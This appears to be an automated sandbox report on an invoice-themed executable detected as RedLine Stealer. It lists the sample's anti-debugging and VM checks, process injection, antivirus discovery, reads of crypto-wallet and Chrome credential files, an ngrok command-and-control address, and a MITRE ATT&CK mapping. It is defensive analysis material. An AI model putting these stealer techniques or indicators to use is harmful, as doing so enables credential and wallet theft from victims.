Source: P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000003.419290897.000000000671D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMwareDCBBAC2AWin32_VideoControllerT3HDN6TUVideoController120060621000000.000000-0006..80982display.infMSBDA_U6N5772PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsP171ZBXLV

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe

Code function: 0_2_00E3CB68 CheckRemoteDebuggerPresent,

0_2_00E3CB68

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe

Code function: 0_2_00E34410 LdrInitializeThunk,

0_2_00E34410

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe

Memory written: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe

Process created: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe

Jump to behavior

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Queries volume information: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Queries volume information: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Source: P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.463827570.000000000672A000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000003.441504611.0000000006727000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.P90GT_Invoice_Related_Property_Tax_P800.exe.3851338.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.P90GT_Invoice_Related_Property_Tax_P800.exe.3851338.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.450292993.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.549326189.0000000003839000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.454537035.0000000002E3F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.276963051.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.277869391.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.275805677.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.277406747.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.272367102.0000000000ADB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: P90GT_Invoice_Related_Property_Tax_P800.exe PID: 6532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: P90GT_Invoice_Related_Property_Tax_P800.exe PID: 6608, type: MEMORYSTR

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\			Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Source: Yara match	File source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.P90GT_Invoice_Related_Property_Tax_P800.exe.3851338.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.P90GT_Invoice_Related_Property_Tax_P800.exe.3851338.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.450292993.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.549326189.0000000003839000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.276963051.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.277869391.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.275805677.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.277406747.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.272367102.0000000000ADB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: P90GT_Invoice_Related_Property_Tax_P800.exe PID: 6532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: P90GT_Invoice_Related_Property_Tax_P800.exe PID: 6608, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.P90GT_Invoice_Related_Property_Tax_P800.exe.3851338.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.P90GT_Invoice_Related_Property_Tax_P800.exe.3851338.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.450292993.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.549326189.0000000003839000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.454537035.0000000002E3F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.276963051.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.277869391.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.275805677.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.277406747.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.272367102.0000000000ADB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: P90GT_Invoice_Related_Property_Tax_P800.exe PID: 6532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: P90GT_Invoice_Related_Property_Tax_P800.exe PID: 6608, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	221 Windows Management Instrumentation	Path Interception	111 Process Injection	1 Masquerading	1 OS Credential Dumping	441 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	11 Process Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	11 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	241 Virtualization/Sandbox Evasion	Security Account Manager	241 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Software Packing	Cached Domain Credentials	123 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
P90GT_Invoice_Related_Property_Tax_P800.exe	62%	Virustotal		Browse
P90GT_Invoice_Related_Property_Tax_P800.exe	81%	ReversingLabs	Win32.Trojan.Woreflint
P90GT_Invoice_Related_Property_Tax_P800.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.2.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1234943	Download File
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.4.unpack	100%	Avira	HEUR/AGEN.1234943	Download File
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.8.unpack	100%	Avira	HEUR/AGEN.1234943	Download File
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.6.unpack	100%	Avira	HEUR/AGEN.1234943	Download File
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.12.unpack	100%	Avira	HEUR/AGEN.1234943	Download File
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.10.unpack	100%	Avira	HEUR/AGEN.1234943	Download File

Domains

Source	Detection	Scanner	Label	Link
2.tcp.eu.ngrok.io	1%	Virustotal		Browse
api.ip.sb	4%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://service.r	0%	URL Reputation	safe
http://tempuri.org/Endpoint/EnvironmentSettings	0%	URL Reputation	safe
http://tempuri.org/t_	0%	URL Reputation	safe
https://api.ip.sb/geoip	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
http://tempuri.org/Endpoint/VerifyUpdateResponse	0%	URL Reputation	safe
http://go.micros	0%	URL Reputation	safe
http://tempuri.org/Endpoint/SetEnvironment	0%	URL Reputation	safe
http://tempuri.org/Endpoint/SetEnvironmentResponse	0%	URL Reputation	safe
http://tempuri.org/Endpoint/GetUpdates	0%	URL Reputation	safe
http://2.tcp.eu.ngrok.io:176854mi	0%	Avira URL Cloud	safe
https://api.ipify.orgcookies//settinString.Removeg	0%	URL Reputation	safe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	0%	URL Reputation	safe
http://tempuri.org/Endpoint/VerifyUpdate	0%	URL Reputation	safe
http://tempuri.org/0	0%	URL Reputation	safe
http://support.a	0%	URL Reputation	safe
http://tempuri.org/Endpoint/CheckConnectResponse	0%	URL Reputation	safe
http://schemas.datacontract.org/2004/07/	0%	URL Reputation	safe
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	0%	URL Reputation	safe
https://helpx.ad	0%	URL Reputation	safe
http://tempuri.org/Endpoint/CheckConnect	0%	URL Reputation	safe
http://2.tcp.eu.ngrok.io:17685	3%	Virustotal		Browse
http://2.tcp.eu.ngrok.io:17685	0%	Avira URL Cloud	safe
https://get.adob	0%	URL Reputation	safe
http://2.tcp.eu.ngrok.io	0%	Avira URL Cloud	safe
http://forms.rea	0%	URL Reputation	safe
http://tempuri.org/Endpoint/GetUpdatesResponse	0%	URL Reputation	safe
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	0%	URL Reputation	safe
http://2.tcp.eu.ngrok.io:17685/	0%	Avira URL Cloud	safe
https://api.ip.sb4mi	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
2.tcp.eu.ngrok.io	18.197.239.5	true	true	1%, Virustotal, Browse	unknown
api.ip.sb	unknown	unknown	true	4%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://2.tcp.eu.ngrok.io:17685/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456660518.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456563113.0000000003307000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456898915.000000000343A000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.467564062.0000000008B8A000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456354168.000000000326E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454943568.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455153119.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456139789.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000003.441429808.0000000008B8A000.00000004.00000800.00020000.00000000.sdmp, tmpC5AD.tmp.1.dr, tmp65E.tmp.1.dr, tmp7F6.tmp.1.dr, tmp35CE.tmp.1.dr, tmp2A94.tmp.1.dr, tmp72A.tmp.1.dr, tmpEBA5.tmp.1.dr, tmpAE7.tmp.1.dr, tmp8C2.tmp.1.dr, tmp7923.tmp.1.dr, tmp98F.tmp.1.dr, tmpC11.tmp.1.dr	false		high
http://service.r	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455903460.00000000030B4000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456660518.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456563113.0000000003307000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456354168.000000000326E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456139789.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456056972.000000000313E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455282886.0000000003023000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456660518.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456563113.0000000003307000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456898915.000000000343A000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.467564062.0000000008B8A000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456354168.000000000326E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454943568.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455153119.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456139789.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000003.441429808.0000000008B8A000.00000004.00000800.00020000.00000000.sdmp, tmpC5AD.tmp.1.dr, tmp65E.tmp.1.dr, tmp7F6.tmp.1.dr, tmp35CE.tmp.1.dr, tmp2A94.tmp.1.dr, tmp72A.tmp.1.dr, tmpEBA5.tmp.1.dr, tmpAE7.tmp.1.dr, tmp8C2.tmp.1.dr, tmp7923.tmp.1.dr, tmp98F.tmp.1.dr, tmpC11.tmp.1.dr	false		high
https://support.google.com/chrome/?p=plugin_wmp	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455903460.00000000030B4000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456660518.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456563113.0000000003307000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456354168.000000000326E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456139789.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456056972.000000000313E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455282886.0000000003023000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/answer/6258784	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455282886.0000000003023000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/EnvironmentSettings	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454537035.0000000002E3F000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454265889.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/t_	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454537035.0000000002E3F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ip.sb/geoip	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454537035.0000000002E3F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454265889.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/?p=plugin_flash	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455282886.0000000003023000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/envelope/D	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454537035.0000000002E3F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/	P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.454265889.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
